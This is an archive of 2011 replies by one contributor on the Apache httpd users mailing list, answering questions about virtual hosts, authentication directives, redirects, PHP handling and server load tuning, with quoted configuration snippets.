The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Directories Being Probed Even When Index Listing Denied

[Jeroen Geilman]

On 03/21/2011 03:28 AM, aaron...@comcast.net wrote:
If a PHP Shell can be uploaded. http://phpshell.sourceforge.net/ Then 
any thing www-data can do so can the shell user, As stated in my post 
about virtual hosts seeing each others document roots.


If you post the root password on your website, then anybody can bring 
the machine down.

It's not very useful to do so, however.



- Original Message -
From: "ASAI" 
To: users@httpd.apache.org
Sent: Saturday, March 19, 2011 6:09:51 PM
Subject: [users@httpd] Directories Being Probed Even When Index 
Listing Denied


Greetings,

I am hosting a domain with no website which is a gateway for several
applications.  Directory indexes are turned off, however I noticed in
the logs today that one the directories which has no reference to the
outside world was probed.  Is it possible that one can get the directory
listing of a host even when index listing is turned off through some
other agency?

How do I guard against things like this?

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org




--
J.

Re: [users@httpd] Re: What are accept.lock files?

[Jeroen Geilman]

On 05/10/2011 07:10 PM, Steven Ross wrote:

Trying one more time. Does anyone know?


On May 7, 2011, at 14:16 , Steven Ross wrote:

I'm running the pre-installed Apache 2 on my Mac OS X 10.5.8 machine. 
The log directory (where it writes error and access logs) is at:

/private/var/log/apache2/

The directory is filled with files like accept.lock.x where x is a 
number between 2 and 5 digits. They are all zero bytes long and date 
back many years.


What are they and can I delete all those empty files?


http://httpd.apache.org/docs/2.2/mod/mpm_common.html#lockfile

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Problem with Files and Auth?

[Jeroen Geilman]

On 05/12/2011 07:45 PM, Knute Johnson wrote:
I'm trying to use the Files directive to force auth for the index.html 
file and I'm getting the following error message if I don't specify 
the file name in the request.  If I do it works fine.


Authorization Required

This server could not verify that you are authorized to access the 
document requested. Either you supplied the wrong credentials (e.g., 
bad password), or your browser doesn't understand how to supply the 
credentials required.


No username/password dialog is presented with this error, just the error.

Any ideas?


Your browser does not understand how to supply the credentials required.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Adwords reports 3 times as many 'clicks' as the server log shows served.

[Jeroen Geilman]

On 05/13/2011 09:16 PM, Xavier Gallagher wrote:

Dear Everyone,

I am currently in debate with Google Adwords about the clicks I am
being charged for.

The issue is simple.  I have  specific landing pages for my Adwords adverts.

My server logs show the landing page served 125 times, Adwords reports
360 'clicks'.

There should be a 1-to-1 mapping as far as I am concerned.  If the
landing page was not requested, then the click, valid or not never
reached the server.

Could a cacheing proxy servers be causing the difference?

I repeated the experiment with a new site.  7 clicks, but only two
reported HTTP GET requests to the landing page.

Does anyone have a similar experience? or explanation?

I have searched for answers, but I only get Adwords vs Analytics
answers, and i don't use AWstats.

I retrieve my logs via cpanel, if that is relevant.

Any help gratefully received.

Thanks

Xavier



It will be very difficult to provide assistance without any form of hard 
data.


You'd need to look at real server logs - not something dished up by a 
crapanel.





--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] question maybe conceptual on virtual hosting

[Jeroen Geilman]

On 05/13/2011 06:50 AM, David Mehler wrote:

Hello,
I've got a question on virtual hosts. I'm running httpd 2.2.3 on a
rhel5 machine. I believe from what I've read that when one sets up a
virtual host that the Listen and other directives in httpd.conf are no
longer valid.


Listen may only be used in the server context. It is invalid in a 
virtualhost context.



  FIrst of all, did I get that right? I've got a Listen
line in httpd.conf telling apache to listen to a single address,



Listen tells apache what PORT to listen on, first of all.
If your distro did not pre-set this (they did), set it to Listen 80 for 
normal HTTP.
You may repeat it as often as required, for SSL (443), or per-IP 
(127.0.0.1:80) or any combination thereof.




  I've
also got a



Order Deny,Allow
Deny from all
Options none
AllowOverRide none


in that file as well as a block pointing to apache's document root
area. In my virtual host configuration file I've got the virtual host
set up with a different document root area, my question is is the
  block from the httpd.conf file still propagated to the
virtual host configuration file or do I have to define that  block in the virtual hosts as well? I hope that made sense.


No, do not repeat Directory /.
Yes, all settings that can be inherited, are inherited.


Thanks.
Dave.



Where is the conceptual question ?


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] question maybe conceptual on virtual hosting

[Jeroen Geilman]

On 05/14/2011 01:13 AM, David Mehler wrote:

Hello,

Thank you for your reply. From what your telling me the below is
wrong. Is the only correction I have to make the elimination of the
duplicate  sections in the virtual hosts or do I have to
take out more?



An SSL NameVirtualHost will only function under specific circumstances.
Odds are you don't meet or need these.
Other than that, yes, that's all.


Thanks.
Dave.

# httpd.conf
# location of the web server tree
DocumentRoot "/var/www/html"

# Configure Directory Security

 Order Deny,Allow
 Deny from all
Options None
AllowOverride None


 Order Allow,Deny
 Allow from all


# Set up Name Virtual Hosts on the default http and https ports
NameVirtualHost *:80
NameVirtualHost *:443

# vhost.conf
#
# Virtual host file
#

# The default (Catch all) Virtual host.

 ServerName default
 DocumentRoot /var/www/html
 ErrorDocument 404 /index.html

Order Deny,Allow
Deny from all
Options none
AllowOverRide none


Order Allow,Deny
Allow from all
Options none
AllowOverRide none



# The example.com http virtual host

  ServerAdmin webmas...@example.com
  ServerName example.com
  ServerAlias www.example.com
  DocumentRoot /srv/www/example.com/public_html
  ErrorLog /srv/www/example.com/logs/error_log
  CustomLog /srv/www/example.com/logs/access_log common

Order Deny,Allow
Deny from all
Options none
AllowOverRide none


Order Allow,Deny
Allow from all
Options none
AllowOverRide none




On 5/13/11, Jeroen Geilman  wrote:

On 05/13/2011 06:50 AM, David Mehler wrote:

Hello,
I've got a question on virtual hosts. I'm running httpd 2.2.3 on a
rhel5 machine. I believe from what I've read that when one sets up a
virtual host that the Listen and other directives in httpd.conf are no
longer valid.

Listen may only be used in the server context. It is invalid in a
virtualhost context.


   FIrst of all, did I get that right? I've got a Listen
line in httpd.conf telling apache to listen to a single address,


Listen tells apache what PORT to listen on, first of all.
If your distro did not pre-set this (they did), set it to Listen 80 for
normal HTTP.
You may repeat it as often as required, for SSL (443), or per-IP
(127.0.0.1:80) or any combination thereof.



   I've
also got a



Order Deny,Allow
Deny from all
Options none
AllowOverRide none


in that file as well as a block pointing to apache's document root
area. In my virtual host configuration file I've got the virtual host
set up with a different document root area, my question is is the
   block from the httpd.conf file still propagated to the
virtual host configuration file or do I have to define that   block in the virtual hosts as well? I hope that made sense.

No, do not repeat Directory /.
Yes, all settings that can be inherited, are inherited.


Thanks.
Dave.


Where is the conceptual question ?


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
"   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org



-
The official User-To-User support forum of the Apache HTTP Server Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
"   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Need advice to choose a configuration

[Jeroen Geilman]

On 05/22/2011 05:43 PM, Isaac XxX wrote:

Hi folks,

I have to move some sites (10) from virtual hosts to a single 
dedicated machine. The number of sites will grow on time.


I've two ways to implement it:
1. set a single apache instance to serve all sites configuring a 
single apache virtual host for each one


Yes.

2. set some virtual servers (with xen for example) and install on each 
them a single apache, serving one or few sites. The root partition 
could had a single apache or nginx doing the load balance task. Of 
course, all virtual servers will be on the same dedicated machine


This will consume much more resources.



Wich way you think is better? (performance, maintainment structure, 
scalability...)


Thanks a lot



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Need advice to choose a configuration

[Jeroen Geilman]

On 05/22/2011 09:42 PM, Macks, Aaron wrote:

the only reasons I'd possibly suggest #2 are:
1.  multiple SSL certs, it is still not easy to have multiple SSL certs on a 
single system, you either need to setup multiple IP addresses for that box or 
run on multiple virtualservers


All modern browsers now support Server Name Indication (SNI), which 
allow you to run SSL vhosts.



2.  If you expect the business to get HUGE for some of the sites, then you can 
spin up more VServers for only the sites that need to handle more traffic... 
Then you're probably talking about dedicated loadbalancers and much more 
hardware anyway

so barring those 2 conditions, I agree 100% with Jeroen that #1 is the way to go

a
--
Aaron Macks
Sr. Unix Systems Engineer

Harvard Business Publishing
300 North Beacon St.|   Watertown, MA 02472
(617) 783-7461|   Fax: (617) 783-7467
www.harvardbusiness.org |   Cell:(978) 317-3614

On May 22, 2011, at 12:54 PM, Jeroen Geilman wrote:


On 05/22/2011 05:43 PM, Isaac XxX wrote:

Hi folks,

I have to move some sites (10) from virtual hosts to a single dedicated 
machine. The number of sites will grow on time.

I've two ways to implement it:
1. set a single apache instance to serve all sites configuring a single apache 
virtual host for each one

Yes.


2. set some virtual servers (with xen for example) and install on each them a 
single apache, serving one or few sites. The root partition could had a single 
apache or nginx doing the load balance task. Of course, all virtual servers 
will be on the same dedicated machine

This will consume much more resources.


Wich way you think is better? (performance, maintainment structure, 
scalability...)

Thanks a lot


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org



-
The official User-To-User support forum of the Apache HTTP Server Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
"   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Files and DirectoryIndex conflict?

[Jeroen Geilman]

On 05/28/2011 08:51 PM, Knute Johnson wrote:
I'm having a problem using the Files directive to require 
authentication on the index.html file.  It doesn't work if it is 
requested with the index URL but does if the URL specifies the file 
directly.  I can't believe that I'm the only person ever to try to do 
this but maybe I am.


So if I request http://localhost/ I get the following error and NO 
user name/password dialog.


401 Authorization Required

Authorization Required

This server could not verify that you are authorized to access the 
document requested. Either you supplied the wrong credentials (e.g., 
bad password), or your browser doesn't understand how to supply the 
credentials required.


But if I request http://localhost/index.html I get the Authentication 
Required dialog and can enter the user name and password and then 
receive the file.


I've tested this with FireFox and Chrome.  I'm running Ubuntu 10.10 
and apache 2.2.16.


Here is the access log from the first request

127.0.0.1 - - [28/May/2011:11:31:16 -0700] "GET / HTTP/1.1" 401 618 
"-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) 
Gecko/20110422 Ubuntu/10.10 (maverick) Firefox/3.6.17"


and the access log from the second request

127.0.0.1 - knute [28/May/2011:11:30:12 -0700] "GET /index.html 
HTTP/1.1" 200 485 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; 
rv:1.9.2.17) Gecko/20110422 Ubuntu/10.10 (maverick) Firefox/3.6.17"


The error.log is empty.


That is not possible; a 4xx error is always logged in the error log.




Here is the virtual host configuration file


ServerAdmin webmaster@localhost

DocumentRoot /var/www




Options FollowSymLinks
AllowOverride None



This does not belong in a vhost.



Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
# added for testing
# any files require group any membership

Requests that hit DirectoryIndex hit this resource block


AuthType Basic
AuthName "ARCLA Lookers"
AuthUserFile /usr/local/apache/passwords/arcla.pwd
AuthGroupFile /usr/local/apache/passwords/groups
Require group lookers players honchos


However, requests for the exact file resource hit this resource block.




ErrorLog ${APACHE_LOG_DIR}/error.log



Apache will refuse to run when it cannot write to the error log, so you 
are likely not looking at the right one.





  DirectoryIndex index.html index.cgi index.pl index.php 
index.xhtml index.htm


THIS is the reason the requests behave differently.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Special configuration for requests that do not match any particular virtual host? Apache 2.2

[Jeroen Geilman]

On 06/02/2011 01:05 AM, Geoff Millikan wrote:

I want to make a catch-all virtual host (like the manual mentions below) which 
redirects any errant hostnames like
http://oopsie.mydomain.com/ to our main hostname at http://www.mydomain.com/   
But the below example doesn't work - I'm getting an
infinite redirect from http://www.mydomain.com/ right back to 
http://www.mydomain.com/

What am I missing?

#First virtual host entry

RewriteEngine On
RewriteRule .* http://www.mydomain.com%{REQUEST_URI} [L,R=301]
ErrorLog/var/log/httpd/error_log
CustomLog   /var/log/httpd/access_log combined



NO.

nonononono.

Get rid of all the rewrite junk and just set a dummy servername; this 
will catch ALL undefined hostnames.


Then Redirect / to the correct vhost.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] url rewrite

[Jeroen Geilman]

On 06/01/2011 10:33 PM, Friedrich Locke wrote:

Hi list users,

this is my first post on this mailing list. My doubt is the following:

Is it possible to redirect a document root based on the site address
like in a template manner wihtout having to configure for each virtual
system ?

I mean this:

Access to http://x.y.z/abc.html should be mapped to documentroot
/var/web/x.y.z/abc.html ? but without having to set each mapping?



Yes; use mass virtual hosting:

VirtualDocumentRoot /var/web/%0/



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] publishing a content across two network

[Jeroen Geilman]

On 06/02/2011 10:43 AM, Ravi Chandran wrote:

hi all,
I have recently downloaded apache http server 2.2, I had published 
some content for a project and its working also. Now my requirement is 
that this published content should be available across two networks. 
So for start, I want to make this content available on a LAN and WIFI 
network. How can I configure it? My LAN IP as 192.168.1.XXX and WIFI 
IP is 10.XX.XX.XX.  Do I have to set the virtualhost settings?




That's way too vague to answer usefully, but if these networks talk to 
each other, set up the appropriate routes and you're good.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] publishing a content across two network

[Jeroen Geilman]

On 06/02/2011 12:35 PM, Ravi Chandran wrote:

hi,


Please don't top-post.

thanks for replying. Actually we have two systems one on WIFI and one 
on LAN, both are running apache web server. 


Okay, so we are talking about TWO completely separate apache installations ?
That wasn't entirely clear before.

I am able to access the content published on the other system using 
browser. 


Okay.

but the same thing is not happening at the other system. 


What "same thing" ? Apache is not working correctly at the second system 
? What does the error log say ?



I mean on that system, the content is not coming, its giving timeout.



Ah, then you most likely have a network problem.



So I am confused as to why one directional traffic is there?



"Directional" ? HTTP is a TCP protocol, there is always two-directional 
traffic.



If I am able to see the content on that system, they should also be 
able to see my content, right?


No, wrong.

Why would they ? the systems are entirely unrelated.

We have the same setup and configuration info other than the domain 
and server name..


Investigate the network, and read the apache error logs for obvious 
network-related problems.




On Thu, Jun 2, 2011 at 3:55 PM, Jeroen Geilman <mailto:jer...@adaptr.nl>> wrote:


On 06/02/2011 10:43 AM, Ravi Chandran wrote:

hi all,
I have recently downloaded apache http server 2.2, I had
published some content for a project and its working also. Now
my requirement is that this published content should be
available across two networks. So for start, I want to make
this content available on a LAN and WIFI network. How can I
configure it? My LAN IP as 192.168.1.XXX and WIFI IP is
10.XX.XX.XX.  Do I have to set the virtualhost settings?


That's way too vague to answer usefully, but if these networks
talk to each other, set up the appropriate routes and you're good.


-- 
J.



-
The official User-To-User support forum of the Apache HTTP Server
Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
<mailto:users-unsubscr...@httpd.apache.org>
 "   from the digest: users-digest-unsubscr...@httpd.apache.org
<mailto:users-digest-unsubscr...@httpd.apache.org>
For additional commands, e-mail: users-h...@httpd.apache.org
<mailto:users-h...@httpd.apache.org>




--
Thanks & Regards
Ravi




--
J.

Re: [users@httpd] publishing a content across two network

[Jeroen Geilman]

On 06/02/2011 01:00 PM, Ravi Chandran wrote:
K, first of all I don't understand the meaning of "Top Post". Can you 
specify in layman's term?


It means post your replies either at the bottom of the previous message, 
or in-line, below the section you are replying to.
Also, please attribute your responses, as this makes it easier for 
people to correlate the messages.




second, the focus of this question is only for one Apache 
installation, as the other one is working fine, so we don't even need 
to bother about it..


Then why did you mention it ?



thirdly, "Same thing" means, seeing the content published on the other 
system from my browser  and apache is working perfectly, as I am 
able to see the content on my system... no errors shown anywhere...


What "other system" ? A client computer with a browser ? Another server ?



fourthly, timeout issue is because the content is not reachable, that 
is what i wanted to know why its not reachable, only for one system.


And we should guess ?
What does the error log say. 2x.



fifthly, "directional" was in logical sense. content of system 1 
accessible on system 2, but not vice versa. agreed that systems are 
purely unrelated to each other. But how will you explain me getting 
the data from other system and they not able to do so?


I'm not going to try.
You may have network issues, or access controls in place, or firewall 
rules, or broken software.


Too many possible reasons - you need to narrow them down.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] how many directives can you have?

[Jeroen Geilman]

On 06/03/2011 02:32 PM, Tommy Peterson wrote:

Yes. Here is what I had to start with


Please don't top-post.



AuthType shibboleth
ShibRequireSession On
ShibUseHeaders On
require shibboleth




LocationMatch cannot match a query string, you need a rewriterule for that.
From the documentation:

For all origin (non-proxy) requests, the URL to be matched is a URL-path 
of the form|/path/|./No scheme, hostname, port, or query string *may be 
included.

*
/


   AuthType shibboleth
ShibRequireSession On
ShibUseHeaders On
require shibboleth




If any of these ALSO have a physical directory, the result is less 
clear-cut.


Authentication should be performed on physical directories whenever 
possible.



--
J.

Re: [users@httpd] need some thoughts on trouble shooting httpd server hangup

[Jeroen Geilman]

On 06/03/2011 10:12 PM, Zaccone, Warren wrote:
Have a problem where httpd server 2.2.15 stops responding to requests 
requiring server to be frequently restarted that has me going in 
circles. I was looking for some direction as to how to pursue.
there are 8 workers running each consuming very little cpu. 
netstat shows process listening on port 80 and 443.
requests on 443 are served fine, but requests on 80 hang,  Backed out 
2.2.15 and went to previous release I had built (httpd 2.2.11) and 
problem has gone away.  No other variables changed, and they were 
built same way, so I am wondering if there was a change in behavior 
between the releases that I have not anticipated or if there is a bug 
that may have been fixed subsequently.   I am testing 2.2.19 in my lab 
without issues, but 2.2.15 is in production so I need to determine the 
cause.
the requests are 99% php scripts with a fair number using web services 
with nusoap.  However I think the issue may be httpd itself because 
port 443 works fine, but port 80 does not respond.  Initially both 
ports are functioning and over time, (a few hours), requests on port 
80 (http) stop responding but 443 (https) remains fine. restarting 
httpd fixes it for a few hours.

I appreciate any thoughts or direction.
thank you.
Warren


It can depend on many things.

Are you running PHP scripts on 443 as well ? The same scripts ?

Or are you running way more on port 80, how much traffic is each port 
serving ?


Examine server-status output thoroughly when this start to happen.



I compiled it as
Apache/2.2.15 (Unix) PHP/5.2.14 mod_ssl/2.2.15 OpenSSL/0.9.8o
   apachectl -V
apache bin directory is /usr/local/apache/bin
httpd is /usr/local/apache/bin/httpd
Server version: Apache/2.2.15 (Unix)
Server built:   Jul 22 2010 16:52:18
Server loaded:  APR 1.3.3, APR-Util 1.3.4
Compiled using: APR 1.3.3, APR-Util 1.3.4
Architecture:   32-bit
Server MPM: Prefork
  threaded: no
forked: yes (variable process count)
Server compiled with
 -D APACHE_MPM_DIR="server/mpm/prefork"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_FCNTL_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D DYNAMIC_MODULE_LIMIT=128
 -D HTTPD_ROOT="/usr/local/apache"
 -D SUEXEC_BIN="/usr/local/apache/bin/suexec"
 -D DEFAULT_PIDLOG="logs/httpd.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_LOCKFILE="logs/accept.lock"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"
$


A lot more helpful would be the output from httpd -S, and an indication 
of the types of content on each port.


Also , try to reproduce it by running ab or something like it, keeping 
an eye on extendedstatus.



--
J.

Re: [users@httpd] What triggers AUTH_TYPE to show up?

[Jeroen Geilman]

On 06/07/2011 10:21 PM, Tommy Peterson wrote:


If I have the following Location directive and in the headers the Auth 
Type shows up accordingly it says [AUTH_TYPE] => shibboleth




  AuthType shibboleth

  ShibRequireSession On

  ShibUseHeaders On

  Require shibboleth



What triggers the "AUTH_TYPE" header variable to show up?

I have another  directive for another directory. It is 
locked down with the log in prompt as above and the headers show up 
the problem is that that AUTH_TYPE=> shibboleth doesn't show up. It is 
the only difference. I know it authenticated as the header also shows 
the attributes.


So I am confused as to why this one variable (AUTH_TYPE) isn't showing 
up.


And there is not "AUTH TYPE not set " in the log or anything else 
referencing the AUTH TYPE.


Any thoughts?




You'll have to show the complete config, and relevant logs - both access 
and error.



--
J.

Re: [users@httpd] Apache 2.2 connections full

[Jeroen Geilman]

On 06/07/2011 10:59 PM, Rob Morin wrote:


Hello all was not sure how to word my subject line...

I posted a few weeks back on how could I increase performance of 
apache... I received quite a few replies and they all helped a bit...


We even added an additional server to our server cluster to total 7 
web servers now, all load balanced by HAProxy


We currently receive about 14 million impressions a day to about 60 
different domains/websites


Our hosting provider uses HAProxy, rather than an appliance,  I assume 
to reduce costs. However I feel like these HAProxy machines are not 
reliable at allWell not under the supervision of our hosting 
company , anyways...J


On to my questions

During peek hours, like a few mins ago, all of our web servers became 
high in load, like close to 100! We still had plenty of RAM left and 
for sure there was no swapping




So what was the cause of the load ?

Examine dstat output while the load spikes and see if there is a high 
percentage spent in IOWait.


Apache does ultimately serve content from disk; is your disk subsystem 
up to the task ?


Please see my config below as  quick snapshot of the httpd.conf file 
on our Centos Servers.


The weird thing is when I would go see the server-status I would see 
all the slots filed with either W or C and nothing else Then after 
a what appears a random amount of time it would all clear up , and 
then come back again. Almost like HAProxy would send a bunch of 
requests to a server, then it would get full and then(haproxy) say, oh 
that server is filled I will not send traffic there, for now, then it 
would come back and see hey this server is  empty, lets send a bunch 
of traffic there...




So it may just as well be the frontend that causes these spikes; you 
want to establish this with certainty.


Do all apache backend boxes spike at the same time ?

You really need to do a more thorough investigation.

Consider graphing the performance of all boxes, and comparing values 
during different times of the day.


An rrdtool grapher like cacti or mrtg will help with this, at marginal 
extra load.


If you consider that too heavy, munin has useful data to correlate CPU 
with disk I/O and apache stats.




We also use memcache to cache sessions and mysql queries, along with 
eAcclerator... I assume that those are functioning properly





That's a pretty large assumption. Don't.


Does this make sense, am I on drugs? J



You tell us.






This tells us nothing. WHICH ONE are you actually using ?
If you're using prefork (which is the stupid choice for high load 
machines), starting up a hundred new threads at peak times will take 
MINUTES.


It looks as if you haven't tuned any of the really vital server 
variables for this supposed high load you're trying to handle.






Options FollowSymLinks

AllowOverride None





You really want to deny access here.




Options -Indexes FollowSymLinks



This does nothing.


AllowOverride All

Order allow,deny

Allow from all





UserDir disable



DirectoryIndex index.php index.html

AccessFileName .htaccess



Order allow,deny

Deny from all



TypesConfig /etc/mime.types

DefaultType text/plain



MIMEMagicFile conf/magic



HostnameLookups Off

ErrorLog logs/error_log

LogLevel notice

LogFormat "%h" combined

LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b" common

LogFormat "%{Referer}i -> %U" referer

LogFormat "%{User-agent}i" agent

CustomLog "/dev/null" combined



That's asenine.


GeoIPEnable On

GeoIPDBFile "/usr/local/share/GeoIP/GeoIPCity.dat"

GeoIPScanProxyHeaders On



Is this in any way a heavy/expensive database ?
What is being logged by this ?
What is it used for ?
Depending on usage, it may be as bad as performing DNS lookups.


--
J.

Re: [users@httpd] .htaccess

[Jeroen Geilman]

On 06/08/2011 09:50 PM, dhottin...@harrisonburg.k12.va.us wrote:
I currently use .htaccess to prompt for username and password and 
point it to an ldap database running on my mailserver.  Im considering 
moving all my mail accounts to gmail.  Does anyone know if it is 
possible to authenticate with .htaccess pointing to gmail for info?


thanks,

ddh




gmail will not expose authentication procedures to the outside world.

This would be quite silly.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] PHP Not Working

[Jeroen Geilman]

On 06/09/2011 11:48 PM, Xavier Lopez wrote:

Hi, I'm using Apache 2.2 on Ubuntu 10.04. I've checked that php mod is
enabled. It is. I'm using virtual hosts.  It serves all html files,
but not php. Following is my VHost configuration:


 ServerName http://new.dev
ServerAdmin webmaster@localhost
 DocumentRoot /home/zave/Public/new
 RewriteEngine off

 
 RewriteEngine on
 RewriteCond %{REQUEST_FILENAME} !-f
 RewriteCond %{REQUEST_FILENAME} !-d
 RewriteRule !\.(js|ico|gif|jpg|png|css)$ /index.php
 


Options FollowSymLinks
AllowOverride None



You are allowing apache full access to your OS root directory.
Don't do that.



Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all


ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all


ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog /var/log/apache2/access.log combined

 Alias /doc/ "/usr/share/doc/"
 
 Options Indexes MultiViews FollowSymLinks
 AllowOverride None
 Order deny,allow
 Deny from all
 Allow from 127.0.0.0/255.0.0.0 ::1/128
 


All my VHosts are configured the same way, save for the ServerName and
DocumentRoot directives. Please help.



I see nothing related to handling PHP.
You need to tell apache what to do with .php files.

This can be implemented - as documented - by adding


SetHandler application/x-httpd-php


in your Documentroot Directory block.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] PHP Not Working

[Jeroen Geilman]

On 06/10/2011 08:31 PM, zavelo...@gmail.com wrote:
J, I couldn't figure out what exactly you meant when you typed "in 
your Documentroot Directory". Did you mean in the block of text that 
contains the DocumentRoot Directive, or the Directory Directive 
containing the document root? I tried it both ways, like so:


ServerName http://new.dev
ServerAdmin webmaster@localhost
DocumentRoot /home/zave/Public/new
RewriteEngine off

SetHandler application/x-httpd-php


AND:


Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all

SetHandler application/x-httpd-php






Both are valid, but the former means you allow PHP processing anywhere, 
while the latter restricts it to your web content location.



After restarting Apache, neither made any difference. Am I doing it 
incorrectly?


You'd have to show concrete evidence of this.
Run httpd -L to verify the php module is loaded.
Clear the browser cache.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
